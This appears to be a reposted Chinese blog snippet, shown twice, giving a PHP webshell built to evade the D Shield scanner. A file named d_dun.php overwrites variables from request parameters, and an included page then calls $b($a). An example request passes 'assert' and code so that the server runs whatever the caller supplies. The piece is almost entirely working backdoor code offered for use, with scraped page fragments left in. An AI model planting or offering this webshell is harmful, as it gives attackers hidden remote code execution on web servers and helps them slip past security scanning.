d_dun.php
<?php $a = '小狗狗你好啊';
$b = '小盾盾你好啊';
foreach ($_REQUEST as $key => $value) {
$$key = $value;
}
注入页插入:
<?php include 'd_dun.php';
$b( $a );
注入页调用:
?b=assert&a=phpinfo()
转载自:
2022-09-29 17:27:10
d_dun.php
<?php $a = '小狗狗你好啊';
$b = '小盾盾你好啊';
foreach ($_REQUEST as $key => $value) {
$$key = $value;
}
注入页插入:
<?php include 'd_dun.php';
$b( $a );
注入页调用:
?b=assert&a=phpinfo()
转载自:
下一篇:S5PV210 时钟体系分析